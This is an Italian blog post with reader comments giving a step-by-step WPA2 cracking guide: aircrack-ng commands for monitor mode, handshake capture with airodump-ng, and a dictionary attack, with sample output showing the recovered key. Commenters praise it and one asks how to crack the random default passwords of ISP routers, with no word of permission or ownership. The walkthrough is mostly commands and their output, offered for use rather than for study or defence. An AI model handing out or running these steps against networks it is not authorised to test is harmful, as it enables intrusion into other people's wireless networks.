craccare una wpa2

Eccovi una bella guida creata da killahop admin del sito: http://www.playnation.itmentre il forum lo trovate QUA(dove sono anche io admin..XD)

Posto questa breve guida, per craccare una chiave wpa2 con un dizionario e aircrack e linux😉
Installaimo aircrack-ng

sudo apt-get install aircrack-ng

procuriamoci il mac address della nostra scheda di rete
apriamo un terminale e digitiamo

ifconfig

individuiamo la scheda wifi, nel mio caso è ath0 e vediamo il valore del campo HWaddr, quello è il mac address della nostra scheda, nel mio caso è ” HWaddr 00:15:af:6b:fe:ca “.

poi ci servono un po di indormazioni sull access point: il mac address , il canale, il BSSID e l’ ESSID tutti reperibili da un

iwlist scan
…. magari da superuser.
copiamotutto il materiale in un file di testo, io ho fatto cosi…
mia interfaccia : ath0

mio mac : 00:15:af:6b:fe:ca

BSSID : 00:1C:F0:5D:34:B9

ESSID : PlaynationOnAir

canale : 1

Iniziamo:
Tutto verra eseguito da superuser….
sudo su
stoppiamo la nostra scheda wifi:

airmon-ng stop ath0
il sistema rispondera cosi:

Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)

dopodichè la avviamo in monitor mode:

airmon-ng start wifi0

nota abbiamo avviato la nostra scheda di rete “ath0” ma usando airmon dobbiamo usare il suffisso “wifi0”
il sistema rispondera cosi:

Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath1 Atheros madwifi-ng VAP (parent: wifi0)
ath2 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

Ora dobbiamo avviare airodump per catturare un handshake, cioe una stretta di mano tra l’access point ed un client che si connette ad esso.
la sintassi e la seguente:

airodump-ng -c 1 --bssid 00:1C:F0:5D:34:B9 -w psk ath0

dove:
-c è il canale dell ap
–bssid è il mac address del ap
ath0 è la nostra scheda wifi
la situazione apparira cosi:

CH 1 ] [ Elapsed: 8 s ] [ 2008-11-22 12:05

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:1C:F0:5D:34:B9 64 100 94 0 0 1 54. WPA2 TKIP PSK PlaynationOnAir

BSSID STATION PWR Rate Lost Packets Probes

ora vedremo che la schermata si pulira e airodup iniziera a catturare informazioni dal acces point sul canale 1 salvando le informazioni nel file chiamato psk
ora dobbiamo aspettare che che qualche client si autentica sull access point
e quando si collega vediamo che sulla schermata del airodump esce una scritta ” WPA handshake: 00:1C:F0:5D:34:B9 ”

vuol dire che il client con mac address 00:1C:F0:5D:34:B9 si è autenticato sul access point.

ora dobbiamo craccare la chiave con aircrack
la sintassi è la seguente:

aircrack-ng -w password.lst -b 00:1C:F0:5D:34:B9 psk*.cap

dove
-w è il nome del dizinario da eseguire
-b è il mac address del ap
con psk*.cap diciamo ad aircrack di sfogliare tra tutti i file che hanno estensione .cap di trovare l’handshake, serve per il bruteforce.
e avremo la seguente schermata:

KEY FOUND! [ evvivalafica ]

Master Key : D8 94 69 73 EA 5B 13 08 31 4E F7 62 D4 F4 3F FB
F2 7A C1 4F 22 A8 A6 8E 4D B7 94 61 71 88 D2 A0

Transcient Key : B9 44 D0 FB FA DE 0A 42 25 C1 B8 DC 1E FD D7 8C
97 C2 12 78 35 28 56 BA 88 06 4A 53 C3 75 AD D3
56 3A 5A 83 FA C3 EF 3F A1 74 21 6B 42 A6 5C 6A
B5 53 89 3B 04 7F 08 0A 27 92 E3 E1 33 8B 1F EB

EAPOL HMAC : 44 06 D9 82 DC C9 D0 22 A9 FE 3C 48 76 55 66 44

abbiamo trovato la chiave: evvivalafica

oppure scaricate il video ad alta qualita QUA
BELLISSIMA GUIDA E FACILE…GRANDE killahop..

9 Risposte to “craccare una wpa2”

  1. Bellissima e utilissima guida!!!! Complimenti killahop….e anche a te ago!!!

  2. XD…..grazie.

  3. grande Ago e anche a te Killahop😀

  4. ago1980 Dice
    ti vorrei proporre una cosa ..puoi contattarmi ?
    tardus(chiocciola) alice punto it

  5. Ryan Lennox Says:

    ciao argo .. potresti fare un post dove siano presenti gli hakeraggi di tutti i tipi di password? personalmente mi interesserebbe la wpa-psk… semrpe se è possibile farlo… un saluto

  6. il metodo e uguale anche per la wpa..,,

  7. Ryan Lennox Says:

    ciao argo… noto che per effettuare questo hakeraggio devo avere un vocabolario…. supponiamo che vorrei hak una rete tipo alice o fastweb che hanno come passw una successione pseudo-casuale alfanumerica… come faccio? non esiste un tool che genera un’insieme di passw di questo tipo??

  8. Per ora non è ancora possibile rompere una chiave tipo quella di alice senza e con un dizionario. E’ in lavorazione un progettino interessante ceh sfrutta un bug del wpa senza dizionario, ma ancora nulla di funzionante al 100%

Lascia un commento

Inserisci i tuoi dati qui sotto o clicca su un'icona per effettuare l'accesso:

Logo WordPress.com

Stai commentando usando il tuo account WordPress.com. Chiudi sessione / Modifica )

Foto Twitter

Stai commentando usando il tuo account Twitter. Chiudi sessione / Modifica )

Foto di Facebook

Stai commentando usando il tuo account Facebook. Chiudi sessione / Modifica )

Google+ photo

Stai commentando usando il tuo account Google+. Chiudi sessione / Modifica )

Connessione a %s...

%d blogger cliccano Mi Piace per questo: